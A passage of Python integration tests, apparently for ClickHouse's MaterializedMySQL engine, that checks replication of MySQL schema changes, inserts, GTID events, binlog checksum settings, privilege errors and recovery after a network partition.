mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_like_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("DROP DATABASE IF EXISTS create_like2")
clickhouse_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("CREATE DATABASE create_like")
mysql_node.query("CREATE DATABASE create_like2")
mysql_node.query("CREATE TABLE create_like.t1 (id INT NOT NULL PRIMARY KEY)")
mysql_node.query("CREATE TABLE create_like2.t1 LIKE create_like.t1")
clickhouse_node.query(
f"CREATE DATABASE create_like ENGINE = MaterializeMySQL('{service_name}:3306', 'create_like', 'root', 'clickhouse')")
mysql_node.query("CREATE TABLE create_like.t2 LIKE create_like.t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\n")
mysql_node.query("USE create_like")
mysql_node.query("CREATE TABLE t3 LIKE create_like2.t1")
mysql_node.query("CREATE TABLE t4 LIKE t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\nt4\n")
check_query(clickhouse_node, "SHOW DATABASES LIKE 'create_like%'", "create_like\n")
clickhouse_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like2")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
# We need to execute a DDL for flush data buffer
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query_with_retry("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
